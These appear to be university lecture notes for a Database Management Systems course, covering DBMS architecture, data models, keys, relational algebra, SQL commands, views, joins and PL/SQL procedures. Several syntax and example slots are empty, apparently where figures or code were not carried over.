CS3492 - DATABASE MANAGEMENT SYSTEMS
SYLLABUS
Purpose of Database System – Views of data – Data Models – Database System Architecture –
Introduction to relational databases – Relational Model – Keys – Relational Algebra – SQL
fundamentals – Advanced SQL features – Embedded SQL– Dynamic SQL
1.1. INTRODUCTION
Data
These are simply raw facts which do not carry any specific meaning. When data are processed, interpreted, organized, structured or presented in a proper way to make them meaningful or useful, they are called information.
The number of visitors to a website by country is an example of data. Finding out that
traffic from the U.S. is increasing while that from Australia is decreasing is meaningful
information.
Database
It is logically coherent collection of data with some inherent meaning, representing some
aspect of real world. It is designed, built and populated with data for a specific purpose.
It is a collection of interrelated data and a set of programs to access those data. The goal
of DBMS is to provide an environment that is both convenient and efficient to use.
MySQL, SQL Server, MongoDB, Oracle Database, PostgreSQL, Informix, Sybase, etc.
are all examples of different databases. These modern databases are managed by DBMS.
Previously, the applications were built directly on top of the file system. Keeping
organizational information in a file-processing system has a number of disadvantages as listed
below:
• Data redundancy and inconsistency
• Difficulty in accessing data
• Data isolation
• Integrity problems
• Atomicity problems
• Concurrent-access anomalies
• Security problems
The same information may be duplicated in several places (files); this is called redundancy. It leads to higher storage and access cost. In addition, it may lead to data inconsistency, i.e., the various copies of the same data may no longer agree.
Example: a change of student address in one file may not get reflected in another file.
The conventional file-processing environments do not allow needed data (e.g., students
who have taken 60 credit hours) to be retrieved in a convenient and efficient manner.
More responsive data-retrieval systems are required for general use.
Example: A bank officer wants to find out the names of all customers who live within a particular postal-code area. If there is no application program for this, the officer has two alternatives: 1. Prepare the list manually from the list of all customers. 2. Ask a system programmer to write the necessary application program.
As data are scattered in various files and files may be in different formats and these files
may be stored in different folders of different departments, writing new application
programs to retrieve the appropriate data is difficult.
The data values stored in the database must satisfy certain types of consistency
constraints. Developers enforce these constraints in the system by adding appropriate
code in various application programs. However, when new constraints are added, it is
difficult to change the programs to enforce them. The problem is compounded when
constraints involve several data items from different files. Example: The pass marks of
the student are 50.
Concurrent-access anomalies
For the sake of overall system performance and faster response, many systems allow multiple users to update the data simultaneously. Example: Let Department A have an account balance of Rs.10,000. If two department clerks debit Rs.500 and Rs.100 from the account of Department A at the same time, the balance may be written back as Rs.9,500 or Rs.9,900 rather than the correct value of Rs.9,400.
Not every user of the system should be able to access all the data. Enforcing security
constraints is difficult in file system. Example: University payroll personnel need to see
only the financial information but not the information about academic records.
The differences between the database approach and the file-processing system are summarized below.

Sharing of data
DBMS: Due to the centralized approach, data sharing is easy.
File system: Data is distributed in many files, and they may be in different formats, so it is not easy to share data.

Data abstraction
DBMS: DBMS gives an abstract view of data that hides the details.
File system: The file system exposes the details of data representation and storage.

Security and protection
DBMS: DBMS provides a good protection mechanism.
File system: It is not easy to protect a file under the file system.

Recovery mechanism
DBMS: DBMS provides a crash recovery mechanism, i.e., it protects the user from the effects of system failures.
File system: The file system does not have a crash recovery mechanism; if the system crashes while entering some data, the content of the file may be lost.

Manipulation techniques
DBMS: DBMS contains a wide variety of sophisticated techniques to store and retrieve the data.
File system: The file system cannot store and retrieve data efficiently.

Concurrency problems
DBMS: DBMS takes care of concurrent access to data using some form of locking.
File system: In the file system, concurrent access leads to many problems, such as one user reading a file while another is deleting or updating information in it.

Where to use
DBMS: The database approach is used in large systems which interrelate many files.
File system: The file system approach is used in smaller systems that do not need to interrelate many files.

Cost
DBMS: The database system is expensive to design.
File system: The file system approach is cheaper to design.

Data redundancy and inconsistency
DBMS: Due to the centralization of the database, the problems of data redundancy and inconsistency are controlled.
File system: The files and application programs are created by different programmers, so there is a lot of duplication of data, which may lead to inconsistency.

Structure
DBMS: The database structure is complex to design.
File system: The file system approach has a simple structure.

Data independence
DBMS: Data independence exists, and it can be of two types: logical data independence and physical data independence.
File system: There is no data independence.

Integrity constraints
DBMS: Integrity constraints are easy to apply.
File system: Integrity constraints are difficult to implement.

Data models
DBMS: In the database approach, three types of data models exist: hierarchical, network and relational data models.
File system: There is no concept of data models.

Flexibility
DBMS: Changes to the content of the data stored in any system are often necessary, and such changes are made more easily with a database approach.
File system: The flexibility of the system is less as compared to the DBMS approach.
1.3. VIEWS OF DATA
Databases change over time as information is inserted and deleted. The collection of
information stored in the database at a particular moment is called an instance of the database.
The overall design of the database is called the database schema. Database systems have several
schemas, partitioned according to the levels of abstraction. The physical schema describes the
database design at the physical level, while the logical schema describes the database design at
the logical level. A database may also have several schemas at the view level, sometimes called
subschemas that describe different views of the database.
In general, the interfaces between the various levels and components should be well
defined so that changes in some parts do not seriously influence others.
The ability to change the schema at one level of a database system without having to
change the schema at the next higher level is called "Data Independence". There are two types
of data independence:
(1) Physical Data Independence: Physical data Independence is the ability to change the
internal schema without having to change the conceptual schema.
e.g., creating additional access structure to improve the performance of the retrieval or
update.
(2) Logical Data Independence: The logical Data Independence is the ability to change the
conceptual schema without having to change application programs (external schema).
e.g., We may change the conceptual schema to expand the database by adding a record
type or data items or reduce the database by removing data items.
Fig. 1.2 depicts the architecture of the database. It shows how different types of users
interact with a database, and how the different components of a database engine are connected
to each other. A database system is partitioned into modules that deal with each of the
responsibilities of the overall system. The functional components of a database system can be
broadly divided into
• Storage manager
• Query processor
• Users
Authorization and integrity manager – This tests for the satisfaction of integrity
constraints and checks the authority of users to access data
Transaction manager – This ensures that the database remains in a consistent state despite system failures and that concurrent transaction executions proceed without conflicting. The transaction manager consists of the concurrency-control manager and the recovery manager.
o Recovery manager – detects system failures and restores the database to the state that existed prior to the occurrence of the failure.
File manager – This manages the allocation of storage space on disk and data structures
used to store that information.
Buffer manager – This is responsible for fetching data from disk into main memory.
The storage manager implements several data structures as part of the physical system
implementation:
Data dictionary - stores metadata about the structure of the database, in particular the
schema of the database.
Indices - can provide fast access to data items. A database index provides pointers to
those data items that hold a particular value.
DDL interpreter - interprets Data Definition Language (DDL) statements and records
the definitions in the data dictionary.
The DML compiler performs query optimization; that is, it picks the lowest cost
evaluation plan from among the various alternatives.
Users are differentiated by the way they are expected to interact with the system.
• Specialized users – write specialized database applications that do not fit into the
traditional data processing framework E.g: CAD system, knowledge based and expert
systems
• Naive users – Interact with the system by invoking one of the permanent application
programs that have been written previously. E.g: people accessing database over the
web, bank tellers, clerical staff
• Database Administrator - A person who has central control over the system is called a
database administrator (DBA). He coordinates all the activities of the database system;
the database administrator has a good understanding of the enterprise’s information
resources and needs.
Functions of a DBA include:
o Schema definition - The DBA creates the original database schema by executing a
set of data definition statements in the DDL.
o Storage structure and access-method definition
o Schema and physical-organization modification - The DBA carries out changes to
the schema and physical organization to reflect the changing needs of the
organization to improve performance.
o Granting of authorization for data access - By granting different types of
authorization, the database administrator can regulate which parts of the database
various users can access.
o Routine maintenance - Examples of the database administrator’s routine
maintenance activities are:
▪ Periodically backing up the database
▪ Ensuring that enough free disk space is available for normal operations, and
upgrading disk space as required
▪ Monitoring jobs running on the database
The DBMS interacts with the operating system when disk accesses—to the database or
to the catalog—are needed. If the computer system is shared by many users, the OS will
schedule DBMS disk access requests and DBMS processing along with other processes. On the
other hand, if the computer system is mainly dedicated to running the database server, the
DBMS will control main memory buffering of disk pages. The DBMS also interfaces with
compilers for general purpose host programming languages, and with application servers and
client programs running on separate machines through the system network interface.
The database and the DBMS catalog are usually stored on disk. Access to the disk is
controlled primarily by the operating system (OS), which schedules disk read/write. Many
DBMSs have their own buffer management module to schedule disk read/write, because this
has a considerable effect on performance. Reducing disk read/write improves performance
considerably. A higher-level stored data manager module of the DBMS controls access to
DBMS information that is stored on disk, whether it is part of the database or the catalog.
A data model provides a collection of tools for describing data, data relationships, data semantics and consistency constraints. There are different types of data models.
The relational model uses a collection of tables to represent both data and the
relationships among those data as shown in Fig. 1.3. Each table has multiple columns, and each
column has a unique name. Tables are also known as relations. The relational model is an
example of a record-based model. Record-based models are so named because the database is
structured in fixed-format records of several types. Each record type defines a fixed number of
fields, or attributes. Relational model is the most widely used data model.
The advantages of the relational model include its simplicity and structural independence.
The entity-relationship (E-R) data model uses a collection of basic objects, called
entities, and relationships among these objects as shown in Fig. 1.4. An entity is a “thing” or
“object” in the real world that is distinguishable from other objects. The entity-relationship
model is widely used in database design. The E-R diagram is built up from the following components:
o Rectangles: which represent entity sets.
o Ellipses: which represent attributes.
o Diamonds: which represent relationship sets.
o Lines: which link attributes to entity sets and entity sets to relationship sets.
The semistructured data model permits the specification of data where individual data
items of the same type may have different sets of attributes. This is in contrast to the data models
mentioned earlier, where every data item of a particular type must have the same set of
attributes. JSON and Extensible Markup Language (XML) are widely used semi-structured data
representations.
Object-oriented programming (especially in Java, C++, or C#) has become the dominant
software-development methodology. This led initially to the development of a distinct object-
oriented data model, but today the concept of objects is well integrated into relational databases.
Standards exist to store objects in relational tables. This can be seen as extending the relational
model with notions of encapsulation, methods, and object identity.
CHAPTER – II
RELATIONAL DATABASES
2.1.1 Introduction
The term relation instance refers to a specific instance of a relation containing a specific
set of rows. The instance of instructor shown in Fig 2.1 has 2 tuples, corresponding to 2
instructors.
For each attribute of a relation, there is a set of permitted values, called the domain of
that attribute. Thus, the domain of the salary attribute of the instructor relation is the set of all
possible salary values, while the domain of the name attribute is the set of all possible instructor
names.
For all relations r, we require that the domains of all attributes of r be atomic. A domain is atomic if
elements of the domain are considered to be indivisible units. For example, suppose the table
instructor had an attribute phone number, which can store a set of phone numbers corresponding
to the instructor. Then the domain of phone number would not be atomic, since an element of
the domain is a set of phone numbers, and it has subparts, namely, the individual phone numbers
in the set.
The null value is a special value that signifies that the value is unknown or does not
exist. For example, suppose as before that we include the attribute phone number in the
instructor relation. If an instructor does not have a phone number at all, use the null value to
signify that the value does not exist.
Database schema is the logical design of the database, and the database instance is a
snapshot of the data in the database at a given instant in time. In general, a relation schema
consists of a list of attributes and their corresponding domains.
Dr Edgar F. Codd, after his extensive research on the Relational Model of database
systems, came up with twelve rules of his own, which according to him, a database must obey
in order to be regarded as a true relational database. These rules can be applied to any database system that manages stored data using only its relational capabilities. This is the foundation rule, which acts as the base for all the other rules.
The data stored in a database, may it be user data or metadata, must be a value of some
table cell. Everything in a database must be stored in a table format.
The NULL values in a database must be given a systematic and uniform treatment. This is a very important rule because a NULL can be interpreted as one of the following: data is missing, data is not known, or data is not applicable.
The structure description of the entire database must be stored in an online catalog,
known as data dictionary, which can be accessed by authorized users. Users can use the same
query language to access the catalog which they use to access the database itself.
A database can only be accessed using a language having linear syntax that supports
data definition, data manipulation, and transaction management operations. This language can
be used directly or by means of some application. If the database allows access to data without
any help of this language, then it is considered as a violation.
All the views of a database, which can theoretically be updated, must also be updatable
by the system.
A database must support high-level insert, update, and delete operations. These must not be limited to a single row; that is, the database must also support union, intersection and minus operations to yield sets of data records.
The data stored in a database must be independent of the applications that access the
database. Any change in the physical structure of a database must not have any impact on how
the data is being accessed by external applications.
The logical data in a database must be independent of its user’s view (application). Any
change in logical data must not affect the applications using it. For example, if two tables are
merged or one is split into two different tables, there should be no impact or change on the user
application. This is one of the most difficult rules to apply.
A database must be independent of the application that uses it. All its integrity
constraints can be independently modified without the need of any change in the application.
This rule makes a database independent of the front-end application and its interface.
The end-user must not be able to see that the data is distributed over various locations.
Users should always get the impression that the data is located at one site only. This rule has
been regarded as the foundation of distributed database systems.
If a system has an interface that provides access to low-level records, then the interface
must not be able to subvert the system and bypass security and integrity constraints.
2.2. KEYS
A key allows us to identify a set of attributes and thus distinguishes entities from each
other. Keys also help to uniquely identify relationships, and thus distinguish relationships from
each other. Different types of keys are:
• Super key
• Primary key
• Candidate key
• Foreign key
A super key is a set of one or more attributes that, taken collectively, allows us to identify uniquely a tuple in the relation.
e.g., {Roll-No}, {Roll-No, Name}, {Roll-No, Address}, {Roll-No, Name, Address} all
these sets are super keys.
A primary key is one or more column(s) in a table used to uniquely identify each row in
the table. Primary key cannot contain Null value.
If a relational schema has more than one key, each is called a candidate key. All the keys which satisfy the condition of a primary key can be candidate keys. In a student relation, {Roll-No} and {Phone-No} are two candidate keys, and we can consider any one of these as the primary key.
Foreign keys are used to represent relationships between tables. An attribute in one
relation whose value matches the primary key in some other relation is called a foreign key.
In the relations above, dno is the primary key of the dept relation and eno is the primary key of the employee relation. The dno attribute of the employee relation matches the primary key dno of the dept relation, so dno in the employee relation is a foreign key.
Referential integrity ensures that a value in one table references an existing value in
another table. The rule of referential integrity states that the value of a foreign key must be
within the domain of its related primary key, or it must be null. This relationship ensures that:
• Records cannot be inserted into a detail table if corresponding records in the master table
do not exist.
• Records of the master table cannot be deleted if corresponding records in the detail table
exist.
Relational database systems are expected to be equipped with a query language that can
assist its users to query the database instances. There are two kinds of query languages −
relational algebra and relational calculus. Relational algebra is a procedural query language.
Relational calculus is a non-procedural or declarative query language. Relational Algebra
targets how to obtain the result. Relational Calculus targets what result to obtain. Here we will
discuss in detail about relational algebra.
r ∪ s = {t | t ∈ r or t ∈ s}
Notation − r U s where r and s are either database relations or relation result set (temporary
relation). In the result, duplicate tuples are automatically eliminated.
Output − Projects the names of the authors who have either written a book or an article or both.
The result of this operation is set of tuples that are present in one relation but not in the second
relation.
Notation: r – s where r and s are relations. It finds all the tuples that are present in r but not in
s.
Output − Provides the name of authors who have written books but not articles.
This operation is used to combine information in two different relations into one.
Notation: r × s where r and s are relations and their output will be defined as –
r × s = {q t | q ∈ r and t ∈ s}
The cardinality of the Cartesian product is the product of the cardinalities of its factors, that is,
|R × S| = |R| × |S|.
Output - Yields a relation that shows all the books and articles written by Elmasri.
The results of relational algebra are also relations but without any name. The rename
operation allows us to name the output relation. 'rename' operation is denoted with small Greek
letter ρ.
1. Set intersection
2. Division
3. Natural join
4. Assignment
Additional operations are defined in terms of the fundamental operations. They do not
add power to the algebra, but are useful to simplify common queries.
Set Intersection
Intersection on two relations R1 and R2 can only be computed if R1 and R2 are union
compatible (These two relations should have same number of attributes and corresponding
attributes in two relations should have same domain). Intersection operator, when applied to
two relations as R1∩R2, will give a relation with tuples which are in R1 as well as R2.
Student ∩ Employee
In terms of basic operators (union and minus), intersection can be expressed as follows:
r ∩ s = r − (r − s)
The division operator, applied to two relations A ÷ B, returns those tuples from relation A that are associated with every tuple of B.
Student_Sports Table
ROLL_NO SPORTS
1 Badminton
2 Cricket
2 Badminton
4 Badminton
All_Sports Table
SPORTS
Badminton
Cricket
The tuples in the resulting relation will have those ROLL_NO values which are associated with all of B's tuples {Badminton, Cricket}. ROLL_NO 1 and 4 are associated with Badminton only. ROLL_NO 2 is associated with all tuples of B. So, the resulting relation will be:
ROLL_NO
2
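Division is not a fundamental operator; as a sketch, it can be rewritten using projection (π), Cartesian product and set difference. For the relations above:
Student_Sports ÷ All_Sports = πROLL_NO(Student_Sports) − πROLL_NO((πROLL_NO(Student_Sports) × All_Sports) − Student_Sports)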
Join Operation
Cartesian product of two relations gives us all the possible tuples that are paired together. But it might not be feasible for us, in certain cases, to take a Cartesian product where we encounter huge relations with thousands of tuples having a considerably large number of attributes, without drawing any meaningful inference.
Types of joins
Theta join combines tuples from different relations that satisfy theta condition. The join
condition is denoted by the symbol θ.
Notation: R1 ⋈θ R2 where R1 and R2 are relations having attributes (A1, A2, ..., An)
and (B1, B2, ... ,Bn) such that the attributes don’t have anything in common, that is R1 ∩ R2 =
Φ. Theta join can use all kinds of comparison operators.
Student table
SID    Name    Std
101    Alex    10
102    Maria   11
Subject table
Class Subject
10 Math
10 English
11 Music
11 Sports
Applying the operation Student ⋈ Student.Std = Subject.Class Subject, we get the output as
SID    Name    Std    Class    Subject
101    Alex    10     10       Math
101    Alex    10     10       English
102    Maria   11     11       Music
102    Maria   11     11       Sports
• Equijoin
When Theta join uses only equality comparison operator, it is said to be equijoin. The
above example corresponds to equijoin.
Natural join does not use any comparison operator. It does not concatenate the way a
Cartesian product does. We can perform a Natural Join only if there is at least one
common attribute that exists between two relations. In addition, the attributes must have
the same name and domain. Natural join acts on those matching attributes where the
values of attributes in both the relations are same.
Courses Table
CID    Course        Dept
CS01   Database      CS
ME01   Mechanics     ME
EE01   Electronics   EE
HoD Table
Dept Head
CS Alex
ME Maya
EE Mira
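Joining on the common attribute Dept, the natural join Courses ⋈ HoD gives:
CID    Course        Dept    Head
CS01   Database      CS      Alex
ME01   Mechanics     ME      Maya
EE01   Electronics   EE      Mira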
• Outer Joins
Theta Join, Equijoin, and Natural Join are called inner joins. An inner join includes only
those tuples with matching attributes and the rest are discarded in the resulting relation.
Therefore, we need to use outer joins to include all the tuples from the participating
relations in the resulting relation. There are three kinds of outer joins − left outer join,
right outer join, and full outer join.
Consider the tables Left and Right for explaining the concept:
Left
A B
100 Database
101 Mechanics
102 Electronics
Right
A B
100 Alex
102 Maya
104 Mira
All the tuples from the Left relation, R, are included in the resulting relation. If there are
tuples in R without any matching tuple in the Right relation S, then the S-attributes of
the resulting relation are made NULL.
Left outer join (Left ⟕ Right):
A      B             C      D
100    Database      100    Alex
101    Mechanics     NULL   NULL
102    Electronics   102    Maya

Right outer join (Left ⟖ Right): all the tuples from the Right relation are included; if a tuple in Right has no matching tuple in Left, the Left-attributes are made NULL.
A      B             C      D
100    Database      100    Alex
102    Electronics   102    Maya
NULL   NULL          104    Mira

Full outer join (Left ⟗ Right): all the tuples from both relations are included, with NULL for the attributes that have no match.
A      B             C      D
100    Database      100    Alex
101    Mechanics     NULL   NULL
102    Electronics   102    Maya
NULL   NULL          104    Mira
Assignment Operation
Sometimes it is useful to be able to write a relational algebra expression in parts using
a temporary relation variable. The assignment operation, denoted by ←, works like assignment
in a programming language. No extra relation is added to the database, but the relation variable
created can be used in subsequent expressions. Assignment to a permanent relation would
constitute a modification to the database.
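As a small illustration (reusing the earlier relations r and s), the intersection r ∩ s can be built from the fundamental operators using assignment:
temp ← r − s
result ← r − temp
Here temp and result are temporary relation variables; result holds exactly the tuples common to r and s.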
CHAPTER – III
SQL FUNDAMENTALS
3.1 INTRODUCTION
The Sequel language was developed by IBM as part of the System R project at the IBM San Jose Research Laboratory. It was later renamed Structured Query Language (SQL).
SQL is the standard command set used to communicate with the relational database
management systems. All tasks related to relational data management - creating tables, querying
the database can be done using SQL.
• Portable.
• numeric(p, d): a fixed-point number with user-specified precision, consisting of p digits in total, of which d digits are after the decimal point.
• date: a calendar date, containing four-digit year, month, and day of the month.
ADD A COLUMN
Syntax:
alter table table_name add column_name datatype(size);
Example:
alter table student add column mark1 int;
DROP A COLUMN
This command is used to delete a column.
Syntax:
alter table table_name drop column_name ;
Example:
SQL>alter table student drop column mark1;
MODIFY COLUMN
This command is used to change the data type of a column or change the size of the
column
Syntax:
ALTER TABLE table_name MODIFY COLUMN column_name datatype;
Example:
alter table student modify name varchar2(25);
ADD PRIMARY KEY
This command is used to make a column as primary key.
Syntax:
alter table table_name add primary key(Field_name);
Example:
alter table student add primary key(Rollno);
DROP PRIMARY KEY
This command is used to remove the primary key.
Syntax:
alter table table_name drop primary key;
Example:
alter table student drop primary key;

a) Selecting particular columns
Syntax:
SELECT Column1, Column2, Column3… FROM Table_name;
Example:
SELECT ROLL_NO, NAME from Student;
b) SELECT with Condition
Selecting all columns satisfying some condition:
Syntax:
SELECT * FROM Table_name where condition;
Example:
SELECT * from Student where NAME='Tina';
Selecting particular columns satisfying some condition:
Syntax:
SELECT Column1, Column2, Column3… FROM Table_name where condition;
Example:
SELECT ROLL_NO from Student where NAME='Tina';
iii. UPDATE
This command is used to modify the data in existing database row(s). Usually, a
conditional clause is to be added to specify which row(s) are to be updated. If conditional
clause is not included, then updation will be done in all the rows.
Syntax:
Example:
iv. DELETE
This command deletes a single record or multiple records from a table. If commit
command is not executed, then the deleted rows can be retrieved using rollback
command.
Syntax:
DELETE FROM table_name WHERE condition;
Example:
DELETE FROM Student WHERE ROLL_NO = 2;
DCL commands are used to control the access to data stored in a database. It ensures
security.
• GRANT
• REVOKE
i) GRANT
This command is used to give access privileges on database objects to the users.
Syntax:
GRANT privilege_name ON object_name TO user_name;
Example:
GRANT SELECT ON Student TO user1;
ii) REVOKE
This command is used to get back the permission from the users.
Syntax:
REVOKE privilege_name ON object_name FROM user_name;
Example:
REVOKE SELECT ON Student FROM user1;
Transaction is a set of tasks grouped into a single execution unit. TCL commands are
used to maintain consistency of the database and management of transactions made by the DML
commands. The following TCL commands are used to control the execution of a transaction:
• COMMIT
• ROLLBACK
• SAVEPOINT
i. COMMIT:
This command is used to save the data permanently.
Syntax:
commit;
ii. ROLLBACK
This command is used to restore the data to the last savepoint or last committed state.
Syntax:
rollback;
iii. SAVEPOINT
This command marks a point in the current transaction. This command is used to save
the data at a particular point temporarily, so that whenever needed can be rollback to
that particular point.
Syntax:
Example:
1. String Operations
• select name from customer where name like 'S%'; //Displays the names of the customers whose name starts with 'S'.
2. Order by Clause
The ORDER BY keyword is used to sort the result of the query in ascending or
descending order. By default, the ORDER BY keyword sorts the records in ascending
order and DESC keyword should be used to sort the records in descending order.
Syntax:
SELECT column1, column2, ... FROM table_name ORDER BY column1 [ASC|DESC], column2 [ASC|DESC], ...;
Examples:
• List all customer details in the Customer table, sorted ascending by city name and
then descending by the CustomerName
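A sketch of this query, assuming the Customer table has the columns City and CustomerName:
SELECT * FROM Customer ORDER BY City ASC, CustomerName DESC;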
3. Set Operations
SQL Set operation is used to combine the data from the result of two or more SELECT
commands. The number of columns retrieved by each SELECT command must be the
same. The columns in the same position in each SELECT statement should have
similar data types.
i. Union:
The UNION operator returns the rows either from the result set of first query or
result set of second query or both. The union operation eliminates the duplicate rows
from its result set.
Syntax:
SELECT column_list FROM table1 UNION SELECT column_list FROM table2;
Example:
SELECT acctno from Account UNION SELECT acctno from Loan;
ii. Union All:
The UNION ALL operator returns all the rows from the result sets of both queries, including the duplicates.
Syntax:
SELECT column_list FROM table1 UNION ALL SELECT column_list FROM table2;
Example:
SELECT acctno from Account UNION ALL SELECT acctno from Loan;
iii. Intersect:
The Intersect operation returns the common rows from the result set of both
SELECT statements. It has no duplicates and it arranges the data in ascending order
by default.
Syntax:
SELECT column_list FROM table1 INTERSECT SELECT column_list FROM table2;
Example:
SELECT acctno from Account INTERSECT SELECT acctno from Loan;
iv. Minus:
Minus operator is used to display the rows which are present in the result set of first
query but not present in the result set of second query. It has no duplicates and data
arranged in ascending order by default.
Syntax:
SELECT column_list FROM table1 MINUS SELECT column_list FROM table2;
Example:
SELECT acctno from Account MINUS SELECT acctno from Loan;
4. NULL values
A NULL signifies an unknown value or that a value does not exist. For example, the
value for the field phone number is NULL, if the person does not have phone or the
person has the phone but we do not know the phone number. Hence it is possible for
tuples to have a null value for some of their attributes denoted by NULL.
The result of any arithmetic expression involving null is null [5 + null returns null]. The predicate is null can be used to check for null values. For example, the following query displays the name of the employees whose salary is null.
select name from Employee where salary is null;
The commonly used aggregate functions are count, sum, avg, min and max.
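As an illustration, assuming the Employee relation used in the examples below (with columns name, deptname and salary):
select count(*) from Employee;                    -- number of employees
select sum(salary) from Employee;                 -- total salary
select avg(salary) from Employee;                 -- average salary
select min(salary), max(salary) from Employee;    -- lowest and highest salary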
GROUP BY is used to group the records of a relation by the value of a specific key (or keys) and then display a selected set of fields for each group.
Syntax:
SELECT column_name, aggregate_function(column_name) FROM table_name GROUP BY column_name;
Example:
select deptname, count(*) from Employee group by deptname;
The HAVING clause is used to apply a condition on the groups formed by the GROUP BY clause. The HAVING clause must follow the GROUP BY clause in a query and must also precede the ORDER BY clause if one is used.
Syntax:
SELECT column_name, aggregate_function(column_name) FROM table_name
GROUP BY column_name
HAVING condition;
Example:
select deptname, count(*) from Employee group by deptname having count(*) > 5;
A Sub query or Inner query or a Nested query is a query within another SQL query and
embedded within the WHERE clause. A sub query is used to return data that will be used in the
main query as a condition. Sub queries must be enclosed within parentheses. Sub queries cannot
have an ORDER BY command but the main query can use an ORDER BY.
Syntax:
SELECT column_name(s) FROM table_name WHERE column_name OPERATOR (SELECT column_name FROM table_name [WHERE condition]);
i) Set Membership
Example:
select projectid from emp_proj where empid in (select empid from employee where
empname = 'John');
select projectid from emp_proj where empid not in (select empid from employee
where empname = 'John');
SQL supports various comparison operators such as <=, >=, <>, any, all, some, etc. to compare sets.
Example:
▪ Display the name of employees whose salary is greater than that of some (at least
one) employees in the manufacturing department.
This query can be written using the > some clause as shown below.
select name from Employee where salary > some (select salary from Employee
where deptname = ' manufacturing ');
▪ Display the name of employees whose salary is greater than the salary of all
employees in the manufacturing department.
select name from Employee where salary > all (select salary from Employee where
deptname = ' manufacturing ');
SQL includes a facility for testing whether the result set of a sub query has any tuples. The exists construct in SQL returns the value true if the result of the sub query is nonempty.
Example
▪ List the courseid of the courses registered by one or more students.
SELECT DISTINCT courseid FROM course WHERE EXISTS (SELECT * FROM
stud_course WHERE course.courseid = stud_course.courseid)
Similarly, the NOT EXISTS construct checks the sub query for the existence of rows; if there are no rows, it returns TRUE, otherwise FALSE.
▪ List the courseid of the courses not chosen by any student.
SELECT DISTINCT courseid FROM course WHERE NOT EXISTS (SELECT *
FROM stud_course WHERE course.courseid = stud_course.courseid)
iv) Test for absence of duplicate tuples
The unique construct tests whether a sub query has any duplicate tuples in its result. The
unique construct evaluates to “true”, if a given sub query contains no duplicates.
Example:
▪ Find all courses that were offered at most once in 2017
select T.course_id from course as T where unique (select R.course_id from section
as R where T.course_id= R.course_id and R.year = 2017);
3.7. VIEWS
In many applications, it is not desirable for all users to see the entire relation. Security considerations require that only a part of the relation be made available to some users, and certain data need to be hidden from them. For example, a clerk may be given the rights to know an instructor's ID, name and department name, but not the instructor's salary. This person should see a relation described, in SQL, by:
select ID, name, dept name from instructor;
It is possible that the result set of above queries can be computed and stored in another
relation and that stored relation can be given to the clerks. However, if the underlying data in
the relation instructor changes, the stored query results would then no longer match the result
of re-executing the query on the relations.
In order to overcome the above issue, SQL allows a “virtual relation” to be defined
by a query, and the relation conceptually contains the result of the query. The virtual
relation is not pre-computed and stored, but instead computed by executing the query
whenever the virtual relation is used. Any such relation that is not part of the logical model,
but is made visible to a user as a virtual relation, is called a view.
i. View Definition
A view in SQL can be created using the create view command. To define a view, we
must give the view a name and must state the query that computes the view.
Syntax:
Example:
Let us consider the EMP relation contains the fields empno, ename and job. The below
command creates a view named v1 with the details of clerks only.
CREATE VIEW v1 AS SELECT empno, ename FROM EMP WHERE job = 'clerk';
The view relation conceptually contains the tuples in the query result, but it is not precomputed or saved. Instead, the database system stores the query expression associated with the view relation. Whenever the view relation is accessed, its tuples are created by computing the query result.
Once we have defined a view, we can use the view name to refer to the virtual relation that the view generates. Using the view v1, we can find the empno of all clerks:
select empno from v1;
View names may be used in a way similar to using a relation name. Certain database
systems allow view relations to be stored, but they make sure that, if the actual relations
used in the view definition change, the view is kept up-to-date. Such views are called
materialized views.
Although views are a useful tool for queries, they present serious problems if we
express updates, insertions, or deletions with them. The difficulty is that a
modification to the database expressed in terms of a view must be translated to a
modification to the actual relations in the logical model of the database.
Suppose the view v1 is made available to a clerk. Since we allow a view name to appear
wherever a relation name is allowed, the clerk can write:
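A hypothetical example of such an insertion (the values shown are illustrative):
insert into v1 values (1234, 'Kumar');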
This insertion must be represented by an insertion into the relation EMP, since EMP is the actual relation from which the view v1 is created. However, to insert a tuple into EMP, we must have some value for job. There are two reasonable approaches to deal with this insertion: reject the insertion and return an error message to the user, or insert the tuple with a null value for job into the EMP relation.
3.8. JOINS
The Join clause is used to combine records from two or more tables in a database.
Cartesian product of two relations results in all possible combination whereas Join combines
the tables by using common values. Join is equivalent to Cartesian product followed by a
selection process. A Join operation pairs two tuples from different relations, if and only if a
given join condition is satisfied. We have discussed the types of joins already. (Refer Section
2.3.2)
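As a sketch of how such joins are written in SQL, assuming employee(eno, ename, dno) and dept(dno, dname) relations as in Section 2.2 (the non-key column names are illustrative):

-- inner join: only employees whose dno matches a department
select e.eno, e.ename, d.dname
from employee e join dept d on e.dno = d.dno;

-- left outer join: all employees, with NULL department details for unmatched rows
select e.eno, e.ename, d.dname
from employee e left outer join dept d on e.dno = d.dno;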
create table student(rollno int primary key, sname varchar(25), class varchar(10));
3.9.1 Functions
Syntax
A function consists of a header and body. The function header has the function name
and a RETURN clause that specifies the data type of the value to be returned. The parameter of
the function can be either in the IN, OUT, or INOUT mode.
Among the three sections, only the executable section is required, the others are optional.
Example:
The following example illustrates how to create and call a function. Let us consider the
Sportsman relation contains the following data.
The below function creates a function that returns the id of the sportsman, if name is
given.
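A minimal sketch of such a function, assuming the Sportsman table has the columns id and name:

create or replace function get_sportsman_id(p_name IN varchar2)
return number
is
   v_id number;
begin
   -- look up the id for the given name
   select id into v_id from Sportsman where name = p_name;
   return v_id;
end;

It can then be called from a query, for example: select get_sportsman_id('Arun') from dual; (the name used here is illustrative).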
3.9.2 Procedures
The PL/SQL stored procedure or simply a procedure is a PL/SQL block which performs
one or more specific tasks. It is just like procedures in other programming languages.
Header: The header contains the name of the procedure and the parameters or variables passed
to the procedure.
Body: The body contains a declaration section, execution section and exception section
similar to a general PL/SQL block.
1. IN parameters: The IN parameter can be referenced by the procedure but the value of
the parameter cannot be overwritten.
2. OUT parameters: The OUT parameter cannot be referenced but the value of the
parameter can be overwritten.
3. INOUT parameters: The INOUT parameter can be referenced, and the value of the parameter can be overwritten. The main difference between a procedure and a function is that a function must always return a value, but a procedure may or may not return a value.
Syntax
CREATE [OR REPLACE] PROCEDURE procedure_name
[ (parameter [,parameter]) ]
IS
[declaration_section]
BEGIN
executable_section
[EXCEPTION
exception_section]
END [procedure_name];
Example:
In this example, a procedure is created to insert record in the product table. So, we need
to create product table first.
create table product(id number(10) primary key,name varchar2(100));
The below procedure is to insert record in product table.
create or replace procedure proc1(id IN NUMBER, name IN VARCHAR2)
is
begin
insert into product values(id,name);
end;
The below code calls the procedure proc1 and inserts the row in the product table.
BEGIN
proc1(101,'Harddisk');
END;
The syntax for deleting a procedure is
DROP PROCEDURE procedure_name;
3.9.3 Triggers
Triggers can be used, for example, to modify table data automatically when DML statements are issued against views.
